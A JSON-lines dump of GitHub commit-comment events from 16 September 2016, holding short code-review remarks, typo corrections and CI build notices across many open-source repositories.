{"id":"4575405973","type":"CommitCommentEvent","actor":{"login":"metaweidner"},"repo":{"name":"uhlibraries-digital/bcdams-map"},"payload":{"comment":{"id":19057654,"position":null,"line":null,"path":null,"commit_id":"03f946c8091b7ecb80f34be21868b6e4c6689b94","created_at":"2016-09-16T17:45:00Z","updated_at":"2016-09-16T17:45:00Z","body":"@seanlw element names updated"}},"created_at":"2016-09-16T17:45:00Z"}
{"id":"4575407563","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19057658,"position":19,"line":19,"path":"ozWeb/python/ozWeb/downloadImageLib.py","commit_id":"c89c049449bf03e176f8edae696d651cb3583faf","created_at":"2016-09-16T17:45:20Z","updated_at":"2016-09-16T17:45:20Z","body":"you can't check URL with local os function???"}},"created_at":"2016-09-16T17:45:20Z"}
{"id":"4575410371","type":"CommitCommentEvent","actor":{"login":"tenderlove"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19057664,"position":null,"line":null,"path":null,"commit_id":"cfb2b14ddce37c3a1c388748e6aaa897ce99923e","created_at":"2016-09-16T17:45:53Z","updated_at":"2016-09-16T17:45:53Z","body":"Fixed in 45e8ccde005dd8191c4c745b6868d0de4ee66a40"}},"created_at":"2016-09-16T17:45:53Z"}
{"id":"4575411252","type":"CommitCommentEvent","actor":{"login":"jdom"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19057668,"position":24,"line":24,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T17:46:06Z","updated_at":"2016-09-16T17:46:06Z","body":"ISystemTargetFactory will not be customer facing (and might not happen at all, we still need to see), so I wouldn't even mention it"}},"created_at":"2016-09-16T17:46:06Z"}
{"id":"4575411570","type":"CommitCommentEvent","actor":{"login":"jason-bragg"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19057670,"position":55,"line":55,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T17:46:10Z","updated_at":"2016-09-16T17:46:10Z","body":"\"on the `ClusterConfiguration` class what you can\" -> \"on the `ClusterConfiguration` class which you can\"?"}},"created_at":"2016-09-16T17:46:10Z"}
{"id":"4575412089","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19057674,"position":24,"line":24,"path":"ozWeb/python/ozWeb/downloadImageLib.py","commit_id":"c89c049449bf03e176f8edae696d651cb3583faf","created_at":"2016-09-16T17:46:15Z","updated_at":"2016-09-16T17:46:15Z","body":"if filePath doesn't exist, create it! and ignore if the file exists."}},"created_at":"2016-09-16T17:46:15Z"}
{"id":"4575413140","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19057676,"position":52,"line":52,"path":"ozWeb/python/ozWeb/downloadImageLib.py","commit_id":"c89c049449bf03e176f8edae696d651cb3583faf","created_at":"2016-09-16T17:46:28Z","updated_at":"2016-09-16T17:46:28Z","body":"remove __name__"}},"created_at":"2016-09-16T17:46:28Z"}
{"id":"4575415116","type":"CommitCommentEvent","actor":{"login":"jason-bragg"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19057680,"position":63,"line":63,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T17:46:50Z","updated_at":"2016-09-16T17:46:50Z","body":"\"prefer to not to use\" -> \"prefer not to use\""}},"created_at":"2016-09-16T17:46:50Z"}
{"id":"4575416035","type":"CommitCommentEvent","actor":{"login":"jdom"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19057681,"position":68,"line":68,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T17:47:01Z","updated_at":"2016-09-16T17:47:01Z","body":"There's a generic extension method that can be used in a nicer way from programmatic config"}},"created_at":"2016-09-16T17:47:01Z"}
{"id":"4575416202","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19057682,"position":16,"line":16,"path":"ozSimpleBackup/python/ozSimpleBackup/simpleBackupLib.py","commit_id":"c89c049449bf03e176f8edae696d651cb3583faf","created_at":"2016-09-16T17:47:02Z","updated_at":"2016-09-16T17:47:02Z","body":"update the doc"}},"created_at":"2016-09-16T17:47:02Z"}
{"id":"4575418863","type":"CommitCommentEvent","actor":{"login":"mwoodiupui"},"repo":{"name":"DSpace/DSpace"},"payload":{"comment":{"id":19057690,"position":7,"line":112,"path":"dspace-api/src/test/java/org/dspace/content/ItemTest.java","commit_id":"9ad981cd982f01a569e961944224ea4bcc54c578","created_at":"2016-09-16T17:47:34Z","updated_at":"2016-09-16T17:47:34Z","body":"This is already merged but, should someone be looking here:  these messages (which are not part of the patch) are not very informative.  Next time we open this code, we should make the assertions say something like \"Item.find returns non-null value\", \"Item.find returns the expected Item\" and the like."}},"created_at":"2016-09-16T17:47:34Z"}
{"id":"4575419369","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19057691,"position":24,"line":24,"path":"ozSimpleBackup/python/ozSimpleBackup/simpleBackupLib.py","commit_id":"c89c049449bf03e176f8edae696d651cb3583faf","created_at":"2016-09-16T17:47:40Z","updated_at":"2016-09-16T17:47:40Z","body":"if destinationDir doesn't exist, create it"}},"created_at":"2016-09-16T17:47:40Z"}
{"id":"4575424947","type":"CommitCommentEvent","actor":{"login":"ALaViolette"},"repo":{"name":"codemirror/CodeMirror"},"payload":{"comment":{"id":19057700,"position":2,"line":57,"path":"mode/meta.js","commit_id":"15dbafc8c5f200b5c4e2362a93d91e5675ddb3b5","created_at":"2016-09-16T17:48:47Z","updated_at":"2016-09-16T17:48:47Z","body":",;lsd;s"}},"created_at":"2016-09-16T17:48:47Z"}
{"id":"4575428112","type":"CommitCommentEvent","actor":{"login":"FlorianWiekhorst"},"repo":{"name":"FlorianWiekhorst/Projekt-A-SS16"},"payload":{"comment":{"id":19057706,"position":null,"line":null,"path":null,"commit_id":"421baab822a7b93b4df930c957f63d047657d9ec","created_at":"2016-09-16T17:49:29Z","updated_at":"2016-09-16T17:49:29Z","body":"Durchnummerierung noch unvollst. da diese sich u.U. noch ändert.\r\n"}},"created_at":"2016-09-16T17:49:29Z"}
{"id":"4575431324","type":"CommitCommentEvent","actor":{"login":"gokcehan"},"repo":{"name":"gokcehan/lf"},"payload":{"comment":{"id":19057717,"position":6,"line":357,"path":"ui.go","commit_id":"d51e99adc16c375dacea6f5c07d9bfcdfcfd4b0f","created_at":"2016-09-16T17:50:12Z","updated_at":"2016-09-16T17:50:12Z","body":"Calling it right afterwards doesn't seem to do any harm. It waits for the command to finish anyway. Point is to do this on a separate goroutine so  it wouldn't block the ui. I realized `defer` is meaningless though. So it should either be:\r\n\r\n    go cmd.Wait()\r\n\r\nor as you said:\r\n\r\n    defer func() { go cmd.Wait() }\r\n\r\nI was trying this by adding a `sleep 1` call to the end of my preview script but I realized now that example doesn't really make much sense. Even `head` command waits for the `sleep 1` to finish anyways. So I will simply push:\r\n\r\n    defer cmd.Wait()\r\n    defer out.Close()\r\n\r\nfor now if it's ok. This way programs respecting to SIGPIPE should finish the process when enough lines are read similar to piping to `head`. I try this with `set previewer /usr/bin/yes` and it does finish as expected. `highlight` also works fine with this without reading the whole file."}},"created_at":"2016-09-16T17:50:12Z"}
{"id":"4575431370","type":"CommitCommentEvent","actor":{"login":"jason-bragg"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19057718,"position":63,"line":63,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T17:50:12Z","updated_at":"2016-09-16T17:50:12Z","body":"In retrospect, I don't think this section is necessary.  I don't think we need to document how to set it directly.  IMO users should use UseStartup and we shouldn't suggest otherwise."}},"created_at":"2016-09-16T17:50:12Z"}
{"id":"4575440861","type":"CommitCommentEvent","actor":{"login":"mboneil10"},"repo":{"name":"umts/microservices-router"},"payload":{"comment":{"id":19057744,"position":7,"line":6,"path":"spec/controllers/models_controller_spec.rb","commit_id":"dfd6186f883a8ba11f5a4b6d09f0f459d47693ab","created_at":"2016-09-16T17:52:06Z","updated_at":"2016-09-16T17:52:06Z","body":"It's gone, but is this something that rubocop corrected? I don't understand why it would be acceptable to write 5 and 6 differently."}},"created_at":"2016-09-16T17:52:06Z"}
{"id":"4575442134","type":"CommitCommentEvent","actor":{"login":"gxmadejs"},"repo":{"name":"gxmadejs/ProgrammingAssignment2"},"payload":{"comment":{"id":19057746,"position":null,"line":null,"path":null,"commit_id":"85ba58834eb2c69ad85e1300c22d89d92fd06574","created_at":"2016-09-16T17:52:20Z","updated_at":"2016-09-16T17:52:20Z","body":"Completed Assignment"}},"created_at":"2016-09-16T17:52:20Z"}
{"id":"4575442172","type":"CommitCommentEvent","actor":{"login":"katz1"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19057747,"position":5,"line":5,"path":"updates/1457_pumpkin_bag.sql","commit_id":"46086bc35f3407af01cd71a6d2a43eaa60f6e1f1","created_at":"2016-09-16T17:52:20Z","updated_at":"2016-09-16T17:52:20Z","body":"@cala \r\n@Zingzah \r\n\r\nThe installer script gives me:\r\nERROR 1054 (42S22) at line 5: Unknown column 'entry' in 'where clause'"}},"created_at":"2016-09-16T17:52:20Z"}
{"id":"4575443966","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19057753,"position":22,"line":1234,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-16T17:52:41Z","updated_at":"2016-09-16T17:52:41Z","body":"Doesn't removing this allow private rooms to spam roombans on users who aren't in the room?"}},"created_at":"2016-09-16T17:52:41Z"}
{"id":"4575444281","type":"CommitCommentEvent","actor":{"login":"aszlig"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19057755,"position":null,"line":null,"path":null,"commit_id":"1c9ac8aabc3105b14c762459bd14a5d53f691449","created_at":"2016-09-16T17:52:45Z","updated_at":"2016-09-16T17:52:45Z","body":"This [breaks building the manual](https://headcounter.org/hydra/build/1316585/nixlog/1/raw)."}},"created_at":"2016-09-16T17:52:45Z"}
{"id":"4575444860","type":"CommitCommentEvent","actor":{"login":"DJVER1TAS"},"repo":{"name":"dado3212/PollDaddyHack"},"payload":{"comment":{"id":19057758,"position":null,"line":null,"path":null,"commit_id":"78d84439dbeb8c31753eece491b2c161cd7df13e","created_at":"2016-09-16T17:52:52Z","updated_at":"2016-09-16T17:52:52Z","body":"Thanks dude!\r\n"}},"created_at":"2016-09-16T17:52:52Z"}
{"id":"4575453345","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19057776,"position":145,"line":1609,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-16T17:54:30Z","updated_at":"2016-09-16T17:54:30Z","body":"If we're using this language in the UI, then should we use \"globally locked\" as well for consistency, or no? "}},"created_at":"2016-09-16T17:54:30Z"}
{"id":"4575456211","type":"CommitCommentEvent","actor":{"login":"merumelu"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19057784,"position":null,"line":null,"path":null,"commit_id":"b1d3172f89b86e52465a74f63a74ac84c491d3e1","created_at":"2016-09-16T17:55:05Z","updated_at":"2016-09-16T17:55:05Z","body":"I think it's a little misleading that this is set in a file inside `api/` when the CSRF stuff is only used by the frontend. :D\r\nWhy not just put it right above `session_start()`?"}},"created_at":"2016-09-16T17:55:05Z"}
{"id":"4575457085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19057787,"position":null,"line":null,"path":null,"commit_id":"38db25d0dd79403aa73e01ac8528f2bb3aa73fc6","created_at":"2016-09-16T17:55:15Z","updated_at":"2016-09-16T17:55:15Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-16T17:55:15Z"}
{"id":"4575460792","type":"CommitCommentEvent","actor":{"login":"oqibidipo"},"repo":{"name":"altelch/iso-tp"},"payload":{"comment":{"id":19057799,"position":null,"line":null,"path":null,"commit_id":"fc26357548d7a7d4a5a54886ee58b4dd3d79a7bf","created_at":"2016-09-16T17:55:58Z","updated_at":"2016-09-16T17:55:58Z","body":"`iso-tp.h` still has `uint16_t id`. Did you forget to add it to the commit?\r\nBesides, `const` is quite pointless with an integer parameter.\r\n\r\nSee http://forum.arduino.cc/index.php?topic=424222.0"}},"created_at":"2016-09-16T17:55:58Z"}
{"id":"4575462510","type":"CommitCommentEvent","actor":{"login":"sgrif"},"repo":{"name":"prathamesh-sonpatki/rails"},"payload":{"comment":{"id":19057801,"position":null,"line":null,"path":null,"commit_id":"78c8235a5768b114532d64d41db0307d6a5a7f9e","created_at":"2016-09-16T17:56:18Z","updated_at":"2016-09-16T17:56:18Z","body":"We should handle this in `read_attribute`, not `_read_attribute`. The latter is the hot path for when you really for sure know the name of the thing."}},"created_at":"2016-09-16T17:56:18Z"}
{"id":"4575463424","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19057805,"position":281,"line":2077,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-16T17:56:29Z","updated_at":"2016-09-16T17:56:29Z","body":"Perhaps we should make a new permission for blacklists...\r\n\r\nOther punishments are such as lock and ban have their own, so I don't see why not to do it for blacklists as well, if we're not using the ``ban`` permission."}},"created_at":"2016-09-16T17:56:29Z"}
{"id":"4575463440","type":"CommitCommentEvent","actor":{"login":"JivaroFAD"},"repo":{"name":"Ingwie/NextStepRc_Dev"},"payload":{"comment":{"id":19057806,"position":null,"line":null,"path":null,"commit_id":"6bd7398a9cef5c04f34543ca8defcb06a0eb6c1a","created_at":"2016-09-16T17:56:29Z","updated_at":"2016-09-16T17:56:29Z","body":"Right :+1: "}},"created_at":"2016-09-16T17:56:29Z"}
{"id":"4575473821","type":"CommitCommentEvent","actor":{"login":"chx"},"repo":{"name":"Gizra/og"},"payload":{"comment":{"id":19057826,"position":null,"line":null,"path":null,"commit_id":"15250a1b442947c2f0a43a6f9cc41208fc4481ab","created_at":"2016-09-16T17:58:29Z","updated_at":"2016-09-16T17:58:29Z","body":"Eh, I was holding back on this. I am not sure this parameter as exposed is a good idea. Perhaps one function containing the logic and two methods on the interface with different names because this parameter changes the return value and usage quite a bit. I am not even sure whether there is a use case for `accessCheck(TRUE)` -- you belong to some groups but you are access denied to them? Wut."}},"created_at":"2016-09-16T17:58:29Z"}
{"id":"4575475585","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19057829,"position":null,"line":null,"path":null,"commit_id":"4b14f912f3d1411609ae2970ac3260e6df93585c","created_at":"2016-09-16T17:58:50Z","updated_at":"2016-09-16T17:58:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1035](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13463&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T17:58:50Z"}
{"id":"4575480112","type":"CommitCommentEvent","actor":{"login":"prathamesh-sonpatki"},"repo":{"name":"prathamesh-sonpatki/rails"},"payload":{"comment":{"id":19057846,"position":null,"line":null,"path":null,"commit_id":"78c8235a5768b114532d64d41db0307d6a5a7f9e","created_at":"2016-09-16T17:59:43Z","updated_at":"2016-09-16T17:59:43Z","body":"Sounds good, I will update it thanks :)"}},"created_at":"2016-09-16T17:59:43Z"}
{"id":"4575484943","type":"CommitCommentEvent","actor":{"login":"mboneil10"},"repo":{"name":"umts/microservices-router"},"payload":{"comment":{"id":19057857,"position":4,"line":6,"path":"spec/rails_helper.rb","commit_id":"40e422048814fe3ffb4a0ec5084e077edc01288b","created_at":"2016-09-16T18:00:36Z","updated_at":"2016-09-16T18:00:36Z","body":"Are the generated tests just a starting point for our TDD?"}},"created_at":"2016-09-16T18:00:36Z"}
{"id":"4575485965","type":"CommitCommentEvent","actor":{"login":"manurosa"},"repo":{"name":"sergiote/PokerRange"},"payload":{"comment":{"id":19057864,"position":27,"line":27,"path":"Poker/Ranges/Reader/FileReader.cs","commit_id":"7b1085ec4f87bfe24d0215622c7833343586be4f","created_at":"2016-09-16T18:00:47Z","updated_at":"2016-09-16T18:00:47Z","body":"@sergiote why is it adding a FileTableCell and not a TableCell?"}},"created_at":"2016-09-16T18:00:47Z"}
{"id":"4575486693","type":"CommitCommentEvent","actor":{"login":"dfaulken"},"repo":{"name":"umts/microservices-router"},"payload":{"comment":{"id":19057866,"position":7,"line":6,"path":"spec/controllers/models_controller_spec.rb","commit_id":"dfd6186f883a8ba11f5a4b6d09f0f459d47693ab","created_at":"2016-09-16T18:00:55Z","updated_at":"2016-09-16T18:00:55Z","body":"It's just inline vs. multi-line block syntax. Line 5 can fit within 80 characters , the block at lines 6-8 can't."}},"created_at":"2016-09-16T18:00:55Z"}
{"id":"4575487268","type":"CommitCommentEvent","actor":{"login":"aszlig"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19057868,"position":null,"line":null,"path":null,"commit_id":"1c9ac8aabc3105b14c762459bd14a5d53f691449","created_at":"2016-09-16T18:01:02Z","updated_at":"2016-09-16T18:01:02Z","body":"So the issue here seems to be the `<itemizedlist/>`, which looks like it's not allowed within a `<varlistentry/>` but haven't dug into that thoroughly yet."}},"created_at":"2016-09-16T18:01:02Z"}
{"id":"4575491075","type":"CommitCommentEvent","actor":{"login":"dfaulken"},"repo":{"name":"umts/microservices-router"},"payload":{"comment":{"id":19057872,"position":4,"line":6,"path":"spec/rails_helper.rb","commit_id":"40e422048814fe3ffb4a0ec5084e077edc01288b","created_at":"2016-09-16T18:01:44Z","updated_at":"2016-09-16T18:01:44Z","body":"Yep, I converted the test you wrote yesterday into the new DSL."}},"created_at":"2016-09-16T18:01:44Z"}
{"id":"4575492798","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19057876,"position":null,"line":null,"path":null,"commit_id":"b1d3172f89b86e52465a74f63a74ac84c491d3e1","created_at":"2016-09-16T18:02:05Z","updated_at":"2016-09-16T18:02:05Z","body":"Nice idea, lemme do it quickly :smile: "}},"created_at":"2016-09-16T18:02:05Z"}
{"id":"4575498787","type":"CommitCommentEvent","actor":{"login":"RayPylant"},"repo":{"name":"silexlabs/Silex"},"payload":{"comment":{"id":19057886,"position":null,"line":null,"path":null,"commit_id":"15bb55bede0d6960d3c99499eb64cdcb71beb73b","created_at":"2016-09-16T18:03:06Z","updated_at":"2016-09-16T18:03:06Z","body":"**_your not giving_** anyone a link  **just codes**\r\nshow how it will look also , then you have something to really show."}},"created_at":"2016-09-16T18:03:06Z"}
{"id":"4575503010","type":"CommitCommentEvent","actor":{"login":"alvexs"},"repo":{"name":"alvexs/iu5-web-5sem"},"payload":{"comment":{"id":19057897,"position":null,"line":null,"path":null,"commit_id":"1a1feded481bf4afbe92340898a0981a4a1a5156","created_at":"2016-09-16T18:03:56Z","updated_at":"2016-09-16T18:03:56Z","body":"LOL gEtignore  - gitignore of course"}},"created_at":"2016-09-16T18:03:56Z"}
{"id":"4575507673","type":"CommitCommentEvent","actor":{"login":"jsierles"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19057902,"position":null,"line":null,"path":null,"commit_id":"2d32a6df27dc60b0e965b638e8e45147f9d4b892","created_at":"2016-09-16T18:04:50Z","updated_at":"2016-09-16T18:04:50Z","body":"Is this coming back?"}},"created_at":"2016-09-16T18:04:50Z"}
{"id":"4575511820","type":"CommitCommentEvent","actor":{"login":"aesimano"},"repo":{"name":"aesimano/technical-interview"},"payload":{"comment":{"id":19057914,"position":5,"line":13,"path":"searching_sorting/quick_sort.py","commit_id":"9c8a47cdc153c7be18bb4427a7fcfe5341859a06","created_at":"2016-09-16T18:05:41Z","updated_at":"2016-09-16T18:05:41Z","body":"should we do something"}},"created_at":"2016-09-16T18:05:41Z"}
{"id":"4575514432","type":"CommitCommentEvent","actor":{"login":"mehdijjz"},"repo":{"name":"oliviertassinari/material-ui"},"payload":{"comment":{"id":19057925,"position":21,"line":41,"path":"docs/src/app/components/pages/components/DatePicker/ExampleInternational.js","commit_id":"2c8c317f1a815afabc178c6149b7259b3cec77cf","created_at":"2016-09-16T18:06:12Z","updated_at":"2016-09-16T18:06:12Z","body":"@oliviertassinari that's great ! merci beacoup :pray: "}},"created_at":"2016-09-16T18:06:12Z"}
{"id":"4575522640","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19057952,"position":null,"line":null,"path":null,"commit_id":"b1d3172f89b86e52465a74f63a74ac84c491d3e1","created_at":"2016-09-16T18:07:53Z","updated_at":"2016-09-16T18:07:53Z","body":"Done in a19b9537b0dd405fcb067b36f868fb2a75a6b8e0 :smile: "}},"created_at":"2016-09-16T18:07:53Z"}
{"id":"4575522838","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19057953,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T18:07:56Z","updated_at":"2016-09-16T18:07:56Z","body":"?????????????????????\r\nAlt-shift or something?"}},"created_at":"2016-09-16T18:07:56Z"}
{"id":"4575523705","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19057956,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T18:08:07Z","updated_at":"2016-09-16T18:08:07Z","body":"Google translate?"}},"created_at":"2016-09-16T18:08:07Z"}
{"id":"4575524518","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19057960,"position":null,"line":null,"path":null,"commit_id":"4b14f912f3d1411609ae2970ac3260e6df93585c","created_at":"2016-09-16T18:08:16Z","updated_at":"2016-09-16T18:08:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1035](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13463&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:09:25"}},"created_at":"2016-09-16T18:08:16Z"}
{"id":"4575526000","type":"CommitCommentEvent","actor":{"login":"paperboyo"},"repo":{"name":"guardian/football-assets"},"payload":{"comment":{"id":19057966,"position":null,"line":null,"path":null,"commit_id":"938437fc88bf5c2fad7ec30ec7c3079316c82e8b","created_at":"2016-09-16T18:08:34Z","updated_at":"2016-09-16T18:08:34Z","body":"Google search:\r\n\r\n![38414](https://cloud.githubusercontent.com/assets/6032869/18596414/f20c44cc-7c40-11e6-87c8-5dcd21943e70.png)\r\n"}},"created_at":"2016-09-16T18:08:34Z"}
{"id":"4575529892","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19057974,"position":null,"line":null,"path":null,"commit_id":"aa4d28263c904937daf6d239377d556704d44f0a","created_at":"2016-09-16T18:09:22Z","updated_at":"2016-09-16T18:09:22Z","body":"Fix indents."}},"created_at":"2016-09-16T18:09:22Z"}
{"id":"4575533585","type":"CommitCommentEvent","actor":{"login":"BrianHawley"},"repo":{"name":"jnicklas/capybara"},"payload":{"comment":{"id":19057990,"position":14,"line":47,"path":"lib/capybara/node/matchers.rb","commit_id":"6d9f80a6ec3d02ea3089afa308a257a04c0642f3","created_at":"2016-09-16T18:10:08Z","updated_at":"2016-09-16T18:10:08Z","body":"Change \"thecurrent\" to \"the current\"."}},"created_at":"2016-09-16T18:10:08Z"}
{"id":"4575537433","type":"CommitCommentEvent","actor":{"login":"kalbac"},"repo":{"name":"SergeiDosWork/wc-edostavka"},"payload":{"comment":{"id":19057995,"position":null,"line":null,"path":null,"commit_id":"430f54a0806e197749289b226daa0abed1985ba3","created_at":"2016-09-16T18:10:52Z","updated_at":"2016-09-16T18:10:52Z","body":"Это не решает проблему с совместимостью зон доставки в новых версиях woocommerce. Буду вам очень признателен если вы \"пульнёте\" модифицированный файл с поддержкой зон доставки."}},"created_at":"2016-09-16T18:10:52Z"}
{"id":"4575542167","type":"CommitCommentEvent","actor":{"login":"jhjin"},"repo":{"name":"e-lab/imagenet-multiGPU.torch"},"payload":{"comment":{"id":19058012,"position":14,"line":35,"path":"model.lua","commit_id":"8712ab0f1c6b3e284196807e10c46be7a6915f1e","created_at":"2016-09-16T18:11:47Z","updated_at":"2016-09-16T18:11:47Z","body":"Disregard that, it was an old version."}},"created_at":"2016-09-16T18:11:47Z"}
{"id":"4575543131","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19058017,"position":null,"line":null,"path":null,"commit_id":"c6ca9c01b2e696622b61627f48a8bf9a55b3f06e","created_at":"2016-09-16T18:11:58Z","updated_at":"2016-09-16T18:11:58Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2328 of 2330 tests passed, 0 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: AUD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T18:11:58Z"}
{"id":"4575554502","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19058050,"position":null,"line":null,"path":null,"commit_id":"1c9ac8aabc3105b14c762459bd14a5d53f691449","created_at":"2016-09-16T18:14:13Z","updated_at":"2016-09-16T18:14:13Z","body":"Fixed in 93974eb, thanks for pointing it out. (Once again I wish we were using marking down…)"}},"created_at":"2016-09-16T18:14:13Z"}
{"id":"4575563697","type":"CommitCommentEvent","actor":{"login":"ParcelRot"},"repo":{"name":"jsonn/crunchy-xml-decoder"},"payload":{"comment":{"id":19058066,"position":null,"line":null,"path":null,"commit_id":"3179332d7df687ccfb95db4c88a02eebceff3aab","created_at":"2016-09-16T18:16:03Z","updated_at":"2016-09-16T18:16:03Z","body":"Thanks for the fix! :)"}},"created_at":"2016-09-16T18:16:03Z"}
{"id":"4575564505","type":"CommitCommentEvent","actor":{"login":"zavlab1"},"repo":{"name":"sergmaks/easylife"},"payload":{"comment":{"id":19058070,"position":null,"line":null,"path":null,"commit_id":"9a18ec8ae3d33e98992ce7f744d48a14a050850d","created_at":"2016-09-16T18:16:13Z","updated_at":"2016-09-16T18:16:13Z","body":"а как вообще gitignore попал в коммит?"}},"created_at":"2016-09-16T18:16:13Z"}
{"id":"4575564551","type":"CommitCommentEvent","actor":{"login":"parejkoj"},"repo":{"name":"lsst/ip_diffim"},"payload":{"comment":{"id":19058071,"position":11,"line":693,"path":"python/lsst/ip/diffim/psfMatch.py","commit_id":"1afe92ddf95be8c6e5a791234ce71c607f932488","created_at":"2016-09-16T18:16:14Z","updated_at":"2016-09-16T18:16:14Z","body":"This one doesn't need list() or keys(): `if 'useRegularization' in self.kConfig:` is enough."}},"created_at":"2016-09-16T18:16:14Z"}
{"id":"4575566337","type":"CommitCommentEvent","actor":{"login":"ajmacdonald"},"repo":{"name":"cwrc/CWRC-Writer"},"payload":{"comment":{"id":19058074,"position":null,"line":null,"path":null,"commit_id":"68e830328901e93b394454fd69d802abb6fd14f9","created_at":"2016-09-16T18:16:35Z","updated_at":"2016-09-16T18:16:35Z","body":"#430 "}},"created_at":"2016-09-16T18:16:35Z"}
{"id":"4575568450","type":"CommitCommentEvent","actor":{"login":"parejkoj"},"repo":{"name":"lsst/ip_diffim"},"payload":{"comment":{"id":19058080,"position":14,"line":231,"path":"python/lsst/ip/diffim/kernelCandidateQa.py","commit_id":"1afe92ddf95be8c6e5a791234ce71c607f932488","created_at":"2016-09-16T18:17:00Z","updated_at":"2016-09-16T18:17:00Z","body":"This one doesn't need list() or keys(), just `for k in metrics:`"}},"created_at":"2016-09-16T18:17:00Z"}
